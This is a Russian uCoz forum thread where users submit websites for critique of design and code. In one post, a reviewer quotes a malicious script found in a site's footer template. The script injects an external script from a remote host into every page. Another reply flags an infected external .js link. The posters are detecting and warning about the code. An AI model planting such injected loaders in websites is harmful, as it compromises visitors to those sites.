| Модератор форума: JonMagon, Yuri_G |
| Сообщество uCoz Общение пользователей Общение (флуд и флейм) Оцените сайт (Оцениваем дизайн, навигацию, код) |
| Оцените сайт |
|
Уважаемые пользователи! В этой теме вы можете разместить заявку на оценку вашего сайта или оценивать сайты по поданным заявкам. Любому вебмастеру всегда нужен взгляд со стороны, и конечно хочется знать мнение окружающих. В этой теме у вас есть возможность не только получить советы по улучшению вашего сайта, но и просто выставить на оценку свой труд По каким критериям будут оцениваться сайты в этой теме
Форма подачи заявки
![]() Прочитайте перед подачей заявки
|
|
сайт снят. заражен. скачанный шаблон
Сообщение отредактировал webanet - Воскресенье, 03 Ноя 2013, 18:38:21
|
|
SiMaGa(Yourserv),
Код http://thuglive.pp.ua/a.js Непонятная зараженная шняга. Зачем это? There Is a Hell, Believe Me I've Seen It. There Is a Heaven, Let's Keep It a Secret
|
|
сайты сняты. один грубый рип. второй скачанный шаблон
Сообщение отредактировал webanet - Воскресенье, 03 Ноя 2013, 19:04:35
|
|
Что же мне это напоминает... Может быть это? Таких шаблонов же выше крыши и телега. Ну зачем? There Is a Hell, Believe Me I've Seen It. There Is a Heaven, Let's Keep It a Secret
Сообщение отредактировал webanet - Воскресенье, 03 Ноя 2013, 19:04:56
|
|
Веба. По идее у тебя не должна выскакивать эта надпись при редактировании. Добавлено (05 Ноя 2013, 16:07:11) Тапок мало. Скорее сапогами. ![]() Вечный воин. Почти как Ахиллес (Брэд Питт). :-)))
Пить не брошу, а курить... буду! :-((( |
|
Сайт конечно же в целом неплох, но слишком много скриптов в коде... В том числе имеется один вредоносный, вот это в шаблоне нижней части сайта уберите: Цитата <script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { var s = "http://you.toy-company.info/?"; s += 689547 + "=_7b_-a374u-2v7m-s7Ot7eT55ur_-Lbp-a3l5Orv_uf_tro"; script.src = s; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script> |
|
Прошу оценить не сайт, а тока шапку.
Я вставил Новую шапку!!! Мы перешли с ФИФА 12 на ФИФА 14. http://footballmanager.ucoz.de/ Вечный воин. Почти как Ахиллес (Брэд Питт). :-)))
|
Квентин-Дорвард, «FIFA 14» без апострофа может иметь другие значения. «EA sports» в тему, если только сайт о спортивных играх известного разработчика. Футболисты на фоне ночного города (кроме одного, рьяно куда-то бегущего) смотрятся так: матч выиграли, идём отмечать. Проблемы с отображением на разрешениях экрана свыше 1280 px.
|
|
|
|
Sonor,
Спс за рецензию. Но мне уже написали почти все мои тренеры в ЛС и Скайпе. Всем всё нравится. А значит - так тому и быть. Но я вам благодарен... Вечный воин. Почти как Ахиллес (Брэд Питт). :-)))
|
Прошу, firedub.ru
К оборзрению! Помог? - Ставь "+" в репу ^____^
Сообщение отредактировал Badumm0605 - Вторник, 05 Ноя 2013, 23:30:00
|
|
|
|
|
|
|
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!

Чат сообщества